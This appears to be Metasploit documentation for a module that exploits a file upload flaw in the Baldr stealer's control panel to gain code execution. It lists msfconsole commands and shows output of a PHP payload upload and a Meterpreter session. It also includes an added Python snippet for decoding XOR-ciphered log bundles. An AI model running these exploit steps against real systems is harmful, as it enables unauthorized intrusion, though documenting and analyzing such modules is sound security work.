Vulnerable Application
Description
This module exploits an arbitrary file upload vulnerability in the Baldr stealer malware control panel. The vulnerability can be turned into RCE by placing malicious PHP code inside a victim logs ZIP file and registering a new bot with the panel, which uploads the ZIP file under the logs directory. On versions 3.0 and 3.1, victim logs are ciphered with a random 4-byte XOR key. This exploit module retrieves the IP-specific XOR key from the panel gate and registers a new victim with the panel, adding the selected payload inside the victim logs.
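For analysts handling a captured v3.0/v3.1 log bundle, the 4-byte XOR described above falls to a known-plaintext check, because a ZIP starts with fixed magic bytes; the same pass can flag script-extension entries of the kind this upload issue relies on. This is an added example, not code from the module or the panel: it assumes the key repeats from offset 0 of the archive, and the sample key, entry names and contents are constructed.

```python
import io
import zipfile

ZIP_MAGIC = b"PK\x03\x04"  # local file header signature at the start of a non-empty ZIP

def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR with a repeating key; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def recover_key(blob: bytes) -> bytes:
    """Known plaintext: first 4 cipher bytes XOR the ZIP magic give the key."""
    if len(blob) < len(ZIP_MAGIC):
        raise ValueError("blob too short to hold a ZIP header")
    return xor_repeat(blob[:4], ZIP_MAGIC)

def decode_bundle(blob: bytes):
    """Return (key, entry names, entries with server-executable extensions)."""
    key = recover_key(blob)
    plain = xor_repeat(blob, key)
    # Assumption: the key repeats from offset 0. If it does not, this check fails.
    if not zipfile.is_zipfile(io.BytesIO(plain)):
        raise ValueError("decoded data is not a ZIP; key assumption is wrong")
    with zipfile.ZipFile(io.BytesIO(plain)) as zf:
        bad = zf.testzip()  # CRC check confirms every entry decoded cleanly
        if bad is not None:
            raise ValueError(f"CRC mismatch in {bad!r}")
        names = zf.namelist()
    flagged = [n for n in names if n.lower().endswith((".php", ".phtml", ".phar"))]
    return key, names, flagged

def build_sample(key: bytes) -> bytes:
    """Constructed sample: inert placeholder entries, XORed with `key`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("browser_data.txt", "constructed placeholder")
        zf.writestr("system_info.txt", "constructed placeholder")
        zf.writestr(".demo.php", "constructed placeholder, not PHP code")
    return xor_repeat(buf.getvalue(), key)

SAMPLE_KEY = bytes.fromhex("a1b2c3d4")  # constructed, not a real key
SAMPLE_BLOB = build_sample(SAMPLE_KEY)

if __name__ == "__main__":
    key, names, flagged = decode_bundle(SAMPLE_BLOB)
    print("key:", key.hex())
    print("entries:", names)
    print("flagged:", flagged)
```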
Verification Steps
- Install the application
- Start msfconsole
- Do: use exploit/multi/http/baldr_upload_exec
- Do: set rhost 192.168.1.27
- Do: check
[*] Verison: Baldr <= v2.0
[+] 192.168.1.27:80 - The target is vulnerable.
Targets
Exploit targets:
Id Name
-- ----
0 Auto
1 <= v2.0
2 v2.2
3 v3.0 & v3.1
Scenarios
msf5 > use exploit/multi/http/baldr_upload_exec
msf5 exploit(exploit/multi/http/baldr_upload_exec) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 exploit(multi/http/baldr_upload_exec) > run
[*] Baldr Verison: <= v2.0
[+] Payload uploaded to /logs/FJETBHLL/.vatw.php
[+] Payload successfully triggered !
[*] Started bind TCP handler against 192.168.1.27:9090
[*] Sending stage (38288 bytes) to 192.168.1.27
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.27:9090) at 2020-07-23 09:49:34 +0300
meterpreter >